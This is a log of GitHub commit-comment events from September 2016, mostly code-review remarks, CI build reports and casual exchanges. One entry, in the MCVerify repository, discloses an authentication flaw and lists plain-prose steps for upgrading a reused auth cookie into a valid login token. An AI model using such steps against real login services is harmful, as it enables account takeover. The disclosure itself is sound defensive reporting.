{"id":"4557359071","type":"CommitCommentEvent","actor":{"login":"socmag"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006281,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:19:37Z","updated_at":"2016-09-13T18:19:37Z","body":"Bring it on!\n\nCongrats on the job\n\nOn Sep 13, 2016 8:18 PM, \"Alex Hultman\" <notifications@github.com> wrote:\n\n> Shit just got real, bitch! 😸\n>\n> —\n> You are receiving this because you commented.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/uWebSockets/uWebSockets/commit/fe76c67911b0e3ff0a132849c45cbbc5b4949d63#commitcomment-19006265>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/AGQZ0j2VeMjlJl26P4MlBvJ2i0wV_8urks5qpujggaJpZM4J78hx>\n> .\n>\n"}},"created_at":"2016-09-13T18:19:37Z"}
{"id":"4557361528","type":"CommitCommentEvent","actor":{"login":"schmitch"},"repo":{"name":"playframework/playframework"},"payload":{"comment":{"id":19006284,"position":17,"line":0,"path":"framework/src/play-netty-server/src/main/scala/play/core/server/netty/NettyModelConversion.scala","commit_id":"a04eb013f3055e4bee2fc81869a1e271ce5d20e8","created_at":"2016-09-13T18:20:04Z","updated_at":"2016-09-13T18:20:04Z","body":"this does not work since it's a Array[String] with 1 object or two objects. And we only need to check if the string from the first object is empty. another way may be `.headOption.getOrElse(\"\")` but since .head is guaranteed here it doesn't make sense:\r\n\r\n```\r\nscala> \"\".split('?')\r\nres0: Array[String] = Array(\"\")\r\n```"}},"created_at":"2016-09-13T18:20:04Z"}
{"id":"4557363396","type":"CommitCommentEvent","actor":{"login":"kam187"},"repo":{"name":"ClearSkyTeam/ClearSky"},"payload":{"comment":{"id":19006290,"position":null,"line":null,"path":null,"commit_id":"ee7f9c41531dec3c859fca6f623977ec0f85c25f","created_at":"2016-09-13T18:20:26Z","updated_at":"2016-09-13T18:20:26Z","body":"wtf, stupid github :/"}},"created_at":"2016-09-13T18:20:26Z"}
{"id":"4557365257","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006295,"position":null,"line":null,"path":null,"commit_id":"dae2a3a7fec0df526060f325075c9d965fabcfd1","created_at":"2016-09-13T18:20:44Z","updated_at":"2016-09-13T18:20:44Z","body":"os_2_0_develop_linux (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-dae2a3a7fec0df526060f325075c9d965fabcfd1-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:20:44Z"}
{"id":"4557365434","type":"CommitCommentEvent","actor":{"login":"nicoasli"},"repo":{"name":"CCSDForge/HAL"},"payload":{"comment":{"id":19006297,"position":null,"line":null,"path":null,"commit_id":"7ab3dfeb520aea17d95c59f25d7398672f21d9e7","created_at":"2016-09-13T18:20:46Z","updated_at":"2016-09-13T18:20:46Z","body":"Le script Bib2Hal est un script Zotero pour importer des références bibliographiques dans l'archive ouverte HAL à partir du logiciel de références bibliographiques Zotero via l'outil Bib2HAL."}},"created_at":"2016-09-13T18:20:46Z"}
{"id":"4557365628","type":"CommitCommentEvent","actor":{"login":"cxj"},"repo":{"name":"Level-2/Transphporm"},"payload":{"comment":{"id":19006298,"position":null,"line":null,"path":null,"commit_id":"0ada294c2ecd1698782985a23f3c90c142fab7b4","created_at":"2016-09-13T18:20:48Z","updated_at":"2016-09-13T18:20:48Z","body":"Thanks!"}},"created_at":"2016-09-13T18:20:48Z"}
{"id":"4557367812","type":"CommitCommentEvent","actor":{"login":"bjflanne"},"repo":{"name":"nats-io/nats-site"},"payload":{"comment":{"id":19006304,"position":null,"line":null,"path":null,"commit_id":"48bae13006d696124d563ea33ae4b61d0d95395c","created_at":"2016-09-13T18:21:14Z","updated_at":"2016-09-13T18:21:14Z","body":"@chriscasper -- I had trouble getting the image displayed (note placeholder) -- I'll send you that separately to include.."}},"created_at":"2016-09-13T18:21:14Z"}
{"id":"4557369253","type":"CommitCommentEvent","actor":{"login":"Serafine"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19006307,"position":null,"line":null,"path":null,"commit_id":"e6a5a25d50e4414a0bce7d6ca2e608df7bfe2d5e","created_at":"2016-09-13T18:21:27Z","updated_at":"2016-09-13T18:21:27Z","body":"Ach, I am so stupid..."}},"created_at":"2016-09-13T18:21:27Z"}
{"id":"4557369692","type":"CommitCommentEvent","actor":{"login":"leonklingele"},"repo":{"name":"lukas2511/dehydrated"},"payload":{"comment":{"id":19006309,"position":24,"line":97,"path":"dehydrated.sh","commit_id":"64e35463cbbfc35ad1bf8537b60602707be2daaf","created_at":"2016-09-13T18:21:32Z","updated_at":"2016-09-13T18:21:32Z","body":"Wow, did they really complain?\n"}},"created_at":"2016-09-13T18:21:32Z"}
{"id":"4557379289","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006332,"position":null,"line":null,"path":null,"commit_id":"7a38204f56ea6320b4ec4f40c9d9560f1329db14","created_at":"2016-09-13T18:23:17Z","updated_at":"2016-09-13T18:23:17Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7a38204f56ea6320b4ec4f40c9d9560f1329db14-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7a38204f56ea6320b4ec4f40c9d9560f1329db14-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:23:17Z"}
{"id":"4557382601","type":"CommitCommentEvent","actor":{"login":"MatrixFrog"},"repo":{"name":"google/closure-compiler-js"},"payload":{"comment":{"id":19006344,"position":null,"line":null,"path":null,"commit_id":"a557c78186f0aeb2e6600854f0a3c919fd1417f0","created_at":"2016-09-13T18:23:52Z","updated_at":"2016-09-13T18:23:52Z","body":"We (the Closure team) are primarily focused on the compiler itself, not the gwt-compiled version, unfortunately. I wish we had the time to be very concerned about everything at once. @samthor may push a new version soon, but I don't know what else he's busy with nowadays."}},"created_at":"2016-09-13T18:23:52Z"}
{"id":"4557384317","type":"CommitCommentEvent","actor":{"login":"Brother10"},"repo":{"name":"limeiragabriel/scavengers"},"payload":{"comment":{"id":19006352,"position":null,"line":null,"path":null,"commit_id":"f79e570a418f7f44559fa4d877864e8d215f41c3","created_at":"2016-09-13T18:24:11Z","updated_at":"2016-09-13T18:24:11Z","body":"A tela ganha uma borda de sangue quando personagem perde energia."}},"created_at":"2016-09-13T18:24:11Z"}
{"id":"4557392977","type":"CommitCommentEvent","actor":{"login":"Serafine"},"repo":{"name":"Stefano80/Stockfish"},"payload":{"comment":{"id":19006380,"position":null,"line":null,"path":null,"commit_id":"e6a5a25d50e4414a0bce7d6ca2e608df7bfe2d5e","created_at":"2016-09-13T18:25:40Z","updated_at":"2016-09-13T18:25:40Z","body":"But interestingly, it does not have any effect. Since I am not searching captures, the only way in which the pawn score can change is that I moved a pawn."}},"created_at":"2016-09-13T18:25:40Z"}
{"id":"4557394273","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006383,"position":null,"line":null,"path":null,"commit_id":"7a38204f56ea6320b4ec4f40c9d9560f1329db14","created_at":"2016-09-13T18:25:53Z","updated_at":"2016-09-13T18:25:53Z","body":"os_2.0_develop_signal_slot_bug (kbenne) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7a38204f56ea6320b4ec4f40c9d9560f1329db14-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-7a38204f56ea6320b4ec4f40c9d9560f1329db14-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:25:53Z"}
{"id":"4557397375","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19006401,"position":null,"line":null,"path":null,"commit_id":"4f860571e73c162c06a897f2419faf43f2fbb93c","created_at":"2016-09-13T18:26:27Z","updated_at":"2016-09-13T18:26:27Z","body":"<a href=\"https:&#x2F;&#x2F;trello.com&#x2F;c&#x2F;D4psv3vK&#x2F;11-ch-010-test-for-player\"><img src=\"https:&#x2F;&#x2F;github.trello.services&#x2F;images&#x2F;trello-icon.png\" width=\"12\" height=\"12\"> [CH-010] Test for &#x2F;player</a>"}},"created_at":"2016-09-13T18:26:27Z"}
{"id":"4557401269","type":"CommitCommentEvent","actor":{"login":"AdFad666"},"repo":{"name":"opengapps/aosp_build"},"payload":{"comment":{"id":19006409,"position":null,"line":null,"path":null,"commit_id":"31a994231ef16a73cc1af7611d9aedf2af6e3305","created_at":"2016-09-13T18:27:11Z","updated_at":"2016-09-13T18:27:11Z","body":"meh, just make everyone sync ALL the things!"}},"created_at":"2016-09-13T18:27:11Z"}
{"id":"4557401457","type":"CommitCommentEvent","actor":{"login":"lesv"},"repo":{"name":"GoogleCloudPlatform/getting-started-java"},"payload":{"comment":{"id":19006410,"position":34,"line":76,"path":"helloworld-jsp/pom.xml","commit_id":"1cae0c439040430a46e50253a5b0ff628381c79e","created_at":"2016-09-13T18:27:13Z","updated_at":"2016-09-13T18:27:13Z","body":"Sigh - In this case, I definitely waited for Travis.  Sorry about this. ;("}},"created_at":"2016-09-13T18:27:13Z"}
{"id":"4557401526","type":"CommitCommentEvent","actor":{"login":"andrewroth"},"repo":{"name":"CruGlobal/fe"},"payload":{"comment":{"id":19006411,"position":20,"line":23,"path":"app/views/fe/admin/panels/_common_fields.html.erb","commit_id":"d74cca22df605aa6140fb3be6ddea0a1a46d9a99","created_at":"2016-09-13T18:27:13Z","updated_at":"2016-09-13T18:27:13Z","body":"You're quick.. I was just committing to transfer some code to my other machine.  I hadn't put a PR so I was going to do more cleanups on it still."}},"created_at":"2016-09-13T18:27:13Z"}
{"id":"4557401939","type":"CommitCommentEvent","actor":{"login":"anpd03"},"repo":{"name":"paviad/GoSharp"},"payload":{"comment":{"id":19006412,"position":null,"line":null,"path":null,"commit_id":"268216c325952580b574f62e8f3645d886aa06d2","created_at":"2016-09-13T18:27:18Z","updated_at":"2016-09-13T18:27:18Z","body":"Thanks for the quick fix!"}},"created_at":"2016-09-13T18:27:18Z"}
{"id":"4557403875","type":"CommitCommentEvent","actor":{"login":"imsauravsingh"},"repo":{"name":"imsauravsingh/homeo"},"payload":{"comment":{"id":19006418,"position":null,"line":null,"path":null,"commit_id":"73e1901fe3c62e83e7945ee4fee2b689f66d5cb1","created_at":"2016-09-13T18:27:38Z","updated_at":"2016-09-13T18:27:38Z","body":"done changes"}},"created_at":"2016-09-13T18:27:38Z"}
{"id":"4557403919","type":"CommitCommentEvent","actor":{"login":"Brother10"},"repo":{"name":"limeiragabriel/scavengers"},"payload":{"comment":{"id":19006420,"position":null,"line":null,"path":null,"commit_id":"5319977bc4fa2c6f9df66d64e5b942d2b00d8aa8","created_at":"2016-09-13T18:27:38Z","updated_at":"2016-09-13T18:27:38Z","body":"A tela ganha uma borda de sangue quando personagem perde energia."}},"created_at":"2016-09-13T18:27:38Z"}
{"id":"4557406376","type":"CommitCommentEvent","actor":{"login":"paviad"},"repo":{"name":"paviad/GoSharp"},"payload":{"comment":{"id":19006426,"position":null,"line":null,"path":null,"commit_id":"268216c325952580b574f62e8f3645d886aa06d2","created_at":"2016-09-13T18:28:04Z","updated_at":"2016-09-13T18:28:04Z","body":"Hey, you're welcome, I'm glad someone is using my library :)"}},"created_at":"2016-09-13T18:28:04Z"}
{"id":"4557408936","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006433,"position":null,"line":null,"path":null,"commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-13T18:28:33Z","updated_at":"2016-09-13T18:28:33Z","body":"os_2_0_develop (macumber) - i386-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-i386-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-i386-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:28:33Z"}
{"id":"4557418353","type":"CommitCommentEvent","actor":{"login":"dclauxperso"},"repo":{"name":"dclauxperso/test"},"payload":{"comment":{"id":19006449,"position":null,"line":null,"path":null,"commit_id":"1012db802a94f54fbce04fc0727e5ad4a72baa06","created_at":"2016-09-13T18:30:11Z","updated_at":"2016-09-13T18:30:11Z","body":"Added a comment"}},"created_at":"2016-09-13T18:30:11Z"}
{"id":"4557418852","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19006450,"position":12,"line":609,"path":"common/src/main/java/com/frostwire/bittorrent/jlibtorrent/SessionManager.java","commit_id":"6ef98eb5992f6bd73be7b3da9de70db16c3f9359","created_at":"2016-09-13T18:30:17Z","updated_at":"2016-09-13T18:30:17Z","body":"I see, easier than doing some dummy object with a byte[] member. got it!"}},"created_at":"2016-09-13T18:30:17Z"}
{"id":"4557419150","type":"CommitCommentEvent","actor":{"login":"noahp78"},"repo":{"name":"noahp78/MCVerify"},"payload":{"comment":{"id":19006451,"position":null,"line":null,"path":null,"commit_id":"e223b86224c8f6ab663e955e5683a720f364f4f1","created_at":"2016-09-13T18:30:19Z","updated_at":"2016-09-13T18:30:19Z","body":"## **Documentation** **on this issue.**\r\n\r\nWe have noticed that the following behaviour could cause a false 'token' upgrade, meaning that the web service that has received the authentication token could upgrade his AUTH_TOKEN cookie to a valid one, issuing more invalid keys.\r\n\r\nPossible Exploit\r\nMake server make (valid) request to /auth and save cookies\r\nWait for user to get their token.\r\nSend request to /poll with the cookie of the /auth request.\r\nYour cookie is now a valid fast-login upgrade.\r\n\r\nWe have not noticed any behaviour of an exploit on this issue.\r\n\r\nNo user data has been affected by this leak"}},"created_at":"2016-09-13T18:30:19Z"}
{"id":"4557422850","type":"CommitCommentEvent","actor":{"login":"anpd03"},"repo":{"name":"paviad/GoSharp"},"payload":{"comment":{"id":19006461,"position":null,"line":null,"path":null,"commit_id":"268216c325952580b574f62e8f3645d886aa06d2","created_at":"2016-09-13T18:30:57Z","updated_at":"2016-09-13T18:30:57Z","body":"Have a game using it where you can play against ai, with tutorial and planning to add some tsumego problems and maybe replaying of pro games. Will send you a copy when it's done!"}},"created_at":"2016-09-13T18:30:57Z"}
{"id":"4557422949","type":"CommitCommentEvent","actor":{"login":"alexhultman"},"repo":{"name":"uWebSockets/uWebSockets"},"payload":{"comment":{"id":19006462,"position":null,"line":null,"path":null,"commit_id":"fe76c67911b0e3ff0a132849c45cbbc5b4949d63","created_at":"2016-09-13T18:30:58Z","updated_at":"2016-09-13T18:30:58Z","body":"Yeah thanks, it's just a contracting thing but still pretty sweet: https://www.youtube.com/watch?v=EMaaMq8T7Cg"}},"created_at":"2016-09-13T18:30:58Z"}
{"id":"4557423742","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19006468,"position":null,"line":null,"path":null,"commit_id":"0e6d0249556fae9afef428dc1c0822388c29d780","created_at":"2016-09-13T18:31:08Z","updated_at":"2016-09-13T18:31:08Z","body":"os_2_0_develop (macumber) - Win64-Windows-7-VisualStudio-12: Tests Failed (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-Win64-Windows-7-VisualStudio-12.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-0e6d0249556fae9afef428dc1c0822388c29d780-Win64-Windows-7-VisualStudio-12.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-NA-red.svg)</a> \n"}},"created_at":"2016-09-13T18:31:08Z"}
{"id":"4557427804","type":"CommitCommentEvent","actor":{"login":"gubatron"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19006477,"position":12,"line":609,"path":"common/src/main/java/com/frostwire/bittorrent/jlibtorrent/SessionManager.java","commit_id":"6ef98eb5992f6bd73be7b3da9de70db16c3f9359","created_at":"2016-09-13T18:31:50Z","updated_at":"2016-09-13T18:31:50Z","body":"wonder if using `ByteBuffer` would be less hackish."}},"created_at":"2016-09-13T18:31:50Z"}
{"id":"4557428408","type":"CommitCommentEvent","actor":{"login":"vdauwera"},"repo":{"name":"broadinstitute/gatk"},"payload":{"comment":{"id":19006479,"position":34,"line":124,"path":"src/main/java/org/broadinstitute/hellbender/tools/IndexFeatureFile.java","commit_id":"3aa516651ecb4e305137ce5d3f638274948c5320","created_at":"2016-09-13T18:31:57Z","updated_at":"2016-09-13T18:31:57Z","body":"Hey guys, I know this is pre-existing code, but as long as you have extension-based GVCF detection: \r\n\r\n    public static final String GVCF_FILE_EXTENSION = \".gvcf\";\r\n\r\nThis is problematic, we've been using `.g.vcf` for years now. Please don't make us move to a new extension. "}},"created_at":"2016-09-13T18:31:57Z"}
{"id":"4557429904","type":"CommitCommentEvent","actor":{"login":"yanex"},"repo":{"name":"yanex/flake"},"payload":{"comment":{"id":19006481,"position":12,"line":null,"path":"example/src/main/java/org/yanex/flaketest/MainActivity.kt","commit_id":"b70aa5de73df1944ed263820a3559f8beb796ba0","created_at":"2016-09-13T18:32:14Z","updated_at":"2016-09-13T18:32:14Z","body":"Hello, world!"}},"created_at":"2016-09-13T18:32:14Z"}
{"id":"4557430102","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":19006482,"position":null,"line":null,"path":null,"commit_id":"641c3a9f93b4c0c91f930aa8f9eb0f9626298526","created_at":"2016-09-13T18:32:16Z","updated_at":"2016-09-13T18:32:16Z","body":"113835705-Low-Temp-Radiant-Variable-Flow-Autosize-Issue (mjwitte) - x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug: OK (1189 of 1189 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.svg)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-641c3a9f93b4c0c91f930aa8f9eb0f9626298526-x86_64-Linux-Ubuntu-14.04-gcc-4.8-UnitTestsCoverage-Debug.html'>![Coverage Badge](http://img.shields.io/badge/coverage%20status-35.98%25-green.svg)</a>\n"}},"created_at":"2016-09-13T18:32:16Z"}
{"id":"4557433077","type":"CommitCommentEvent","actor":{"login":"DanielShlomo"},"repo":{"name":"DanielShlomo/Duckuino"},"payload":{"comment":{"id":19006486,"position":null,"line":null,"path":null,"commit_id":"fd8c1fbd01f163c7a05f2a88cdf9c502a755a6b1","created_at":"2016-09-13T18:32:47Z","updated_at":"2016-09-13T18:32:47Z","body":"https://gist.github.com/DanielShlomo/a03b849d993c6c5cca1d9f95245a10ba\r\nIt's a just an a idea for improvement, i didn't manage to do all the error handling you did but it does work.\r\n\r\nYou can now do key combos (like: \"CTRL a\" or \"CTRL c\"), the only problem is that you cannot use more than two keys. (like: \"CTRL ALT DELETE\").\r\n\r\nYou can use it if you want."}},"created_at":"2016-09-13T18:32:47Z"}
{"id":"4557433133","type":"CommitCommentEvent","actor":{"login":"nsoblath"},"repo":{"name":"project8/katydid"},"payload":{"comment":{"id":19006487,"position":null,"line":null,"path":null,"commit_id":"1088cf608ea4cc01c0d11d12b655ccf3edcf505a","created_at":"2016-09-13T18:32:48Z","updated_at":"2016-09-13T18:32:48Z","body":"Hi Penny.  I did already merge the 2.5.3 changes (as I had put them into the 2.5.3b branch) into the Katydid release that I made last week.  I thought I understood everything that needed to be there, but it's entirely possible that my understanding wasn't complete.\r\n\r\nPart of the included changes were the new configuration parameter `transform-state`.  I had hoped that would allow you to do what you need with the FFT of Locust MC signals.  Can you take a look and tell me if that's the case?"}},"created_at":"2016-09-13T18:32:48Z"}
{"id":"4557435552","type":"CommitCommentEvent","actor":{"login":"maleadt"},"repo":{"name":"JuliaGPU/julia"},"payload":{"comment":{"id":19006496,"position":null,"line":null,"path":null,"commit_id":"2ee239c3058eb8f1870925e38554952ab732757c","created_at":"2016-09-13T18:33:16Z","updated_at":"2016-09-13T18:33:16Z","body":"@nanosoldier `runbenchmarks(ALL, vs = \"2ee239c3058eb8f1870925e38554952ab732757c\")`"}},"created_at":"2016-09-13T18:33:16Z"}
{"id":"4557436499","type":"CommitCommentEvent","actor":{"login":"aldenml"},"repo":{"name":"frostwire/frostwire"},"payload":{"comment":{"id":19006501,"position":12,"line":609,"path":"common/src/main/java/com/frostwire/bittorrent/jlibtorrent/SessionManager.java","commit_id":"6ef98eb5992f6bd73be7b3da9de70db16c3f9359","created_at":"2016-09-13T18:33:26Z","updated_at":"2016-09-13T18:33:26Z","body":"so you want to use a more costly solution :)"}},"created_at":"2016-09-13T18:33:26Z"}
{"id":"4557437819","type":"CommitCommentEvent","actor":{"login":"Rayne"},"repo":{"name":"lukas2511/dehydrated"},"payload":{"comment":{"id":19006504,"position":24,"line":97,"path":"dehydrated.sh","commit_id":"64e35463cbbfc35ad1bf8537b60602707be2daaf","created_at":"2016-09-13T18:33:41Z","updated_at":"2016-09-13T18:33:41Z","body":"Is it forbidden to be backwards compatible and test `/etc/letsencrypt.sh` and friends or do you prefer a clean cut?\r\n\r\nSome ideas: You could also add a symbolic link or a `letsencrypt.sh` script with a big deprecation warning which forwards the arguments to `dehydrated`."}},"created_at":"2016-09-13T18:33:41Z"}
{"id":"4557443047","type":"CommitCommentEvent","actor":{"login":"x421"},"repo":{"name":"PullNotifications/PullNotifications"},"payload":{"comment":{"id":19006516,"position":30,"line":111,"path":"pn_server.nim","commit_id":"2ee7619254ad6db0b708b6789cf5cbb9cdf9840a","created_at":"2016-09-13T18:34:39Z","updated_at":"2016-09-13T18:34:39Z","body":"@mrbandler Can you throw a ```newException(Error404, \"message\")``` here instead of assigning the result? Because the main request handler catches the error and that way we can apply special things to those errors (look into pn_types to see which are available) if needed."}},"created_at":"2016-09-13T18:34:39Z"}
{"id":"4557444277","type":"CommitCommentEvent","actor":{"login":"Capricorno"},"repo":{"name":"Capricorno/voxelands-1608.01"},"payload":{"comment":{"id":19006518,"position":null,"line":null,"path":null,"commit_id":"d75868fb55c1f44a8233667daa82a9c436b6d674","created_at":"2016-09-13T18:34:53Z","updated_at":"2016-09-13T18:34:53Z","body":"Furthermore:\r\nspace rock columns and wall added."}},"created_at":"2016-09-13T18:34:53Z"}
{"id":"4557445322","type":"CommitCommentEvent","actor":{"login":"maleadt"},"repo":{"name":"JuliaGPU/julia"},"payload":{"comment":{"id":19006519,"position":null,"line":null,"path":null,"commit_id":"2ee239c3058eb8f1870925e38554952ab732757c","created_at":"2016-09-13T18:35:04Z","updated_at":"2016-09-13T18:35:04Z","body":"@nanosoldier `runbenchmarks(ALL, vs = \"@2ee239c3058eb8f1870925e38554952ab732757c\")`"}},"created_at":"2016-09-13T18:35:04Z"}
{"id":"4557446275","type":"CommitCommentEvent","actor":{"login":"bbondy"},"repo":{"name":"bsclifton/browser-laptop"},"payload":{"comment":{"id":19006522,"position":null,"line":null,"path":null,"commit_id":"5e47b3580ad9c4e1aea528510c3189c2d4a68e8b","created_at":"2016-09-13T18:35:15Z","updated_at":"2016-09-13T18:35:15Z","body":"++"}},"created_at":"2016-09-13T18:35:15Z"}
{"id":"4557448480","type":"CommitCommentEvent","actor":{"login":"kuzyn"},"repo":{"name":"n10as/n20.as"},"payload":{"comment":{"id":19006528,"position":null,"line":null,"path":null,"commit_id":"ddc0d5ee736daa946d1a4c03d150d8e89baf9bd4","created_at":"2016-09-13T18:35:37Z","updated_at":"2016-09-13T18:35:37Z","body":"nah, and async is actually mostly supported via html5 nowaday (along with defer, see https://developer.mozilla.org/en-US/docs/Web/HTML/Element/script)\r\n\r\n`<script async src=\"javascript.js\"></script>`\r\n\r\nwhat I meant is just load them in our header element/prop(?) through a cdn aka \r\n`<script type=\"text/javascript\" src=\"https://cdnjs.cloudflare.com/ajax/libs/react/15.3.1/react.min.js\"></script>`\r\n"}},"created_at":"2016-09-13T18:35:37Z"}
{"id":"4557449930","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19006533,"position":14,"line":46,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/BandImageUploadMB.java","commit_id":"7d2496d83eef29daaa4a0aef824f06e8f6527eaa","created_at":"2016-09-13T18:35:54Z","updated_at":"2016-09-13T18:35:54Z","body":"Proper logging, yo!"}},"created_at":"2016-09-13T18:35:54Z"}
{"id":"4557450717","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19006536,"position":23,"line":60,"path":"band-web/src/main/java/hu/schonherz/training/band/managedbeans/view/BandImageUploadMB.java","commit_id":"7d2496d83eef29daaa4a0aef824f06e8f6527eaa","created_at":"2016-09-13T18:36:04Z","updated_at":"2016-09-13T18:36:04Z","body":"Proper logging, yo!"}},"created_at":"2016-09-13T18:36:04Z"}
{"id":"4557450818","type":"CommitCommentEvent","actor":{"login":"bradleyrichter"},"repo":{"name":"bsclifton/browser-laptop"},"payload":{"comment":{"id":19006538,"position":null,"line":null,"path":null,"commit_id":"5e47b3580ad9c4e1aea528510c3189c2d4a68e8b","created_at":"2016-09-13T18:36:06Z","updated_at":"2016-09-13T18:36:06Z","body":"WFM. thanks!"}},"created_at":"2016-09-13T18:36:06Z"}
{"id":"4557451057","type":"CommitCommentEvent","actor":{"login":"domenkozar"},"repo":{"name":"obadz/nixpkgs"},"payload":{"comment":{"id":19006539,"position":18,"line":365,"path":"nixos/modules/system/boot/loader/grub/grub.nix","commit_id":"45e219d03f80a0050b0a2b645a7ab72285d0cb7e","created_at":"2016-09-13T18:36:10Z","updated_at":"2016-09-13T18:36:10Z","body":"Would be nice to explain what that really means/implies"}},"created_at":"2016-09-13T18:36:10Z"}
{"id":"4557451595","type":"CommitCommentEvent","actor":{"login":"lukas2511"},"repo":{"name":"lukas2511/dehydrated"},"payload":{"comment":{"id":19006544,"position":24,"line":97,"path":"dehydrated.sh","commit_id":"64e35463cbbfc35ad1bf8537b60602707be2daaf","created_at":"2016-09-13T18:36:15Z","updated_at":"2016-09-13T18:36:15Z","body":"@Rayne i didn't want to keep the old name around in places. yes this will break some things *now*, but I'm hoping for package maintainers to work around this, and I hope that people who are pulling from master will figure it out themselfes"}},"created_at":"2016-09-13T18:36:15Z"}
{"id":"4557454887","type":"CommitCommentEvent","actor":{"login":"lukas2511"},"repo":{"name":"lukas2511/dehydrated"},"payload":{"comment":{"id":19006554,"position":24,"line":97,"path":"dehydrated.sh","commit_id":"64e35463cbbfc35ad1bf8537b60602707be2daaf","created_at":"2016-09-13T18:36:48Z","updated_at":"2016-09-13T18:36:48Z","body":"@leonklingele yes :("}},"created_at":"2016-09-13T18:36:48Z"}
{"id":"4557455318","type":"CommitCommentEvent","actor":{"login":"attilagyongyosi"},"repo":{"name":"schonherz-java-ee-2016-summer/Band"},"payload":{"comment":{"id":19006555,"position":20,"line":32,"path":"band-service/src/main/java/hu/schonherz/training/band/impl/BandMateServiceImpl.java","commit_id":"5e897187b60a4bee64b5d5e497ee7dd5544d7ad5","created_at":"2016-09-13T18:36:52Z","updated_at":"2016-09-13T18:36:52Z","body":"You never use this logger. Why do you have it?"}},"created_at":"2016-09-13T18:36:52Z"}
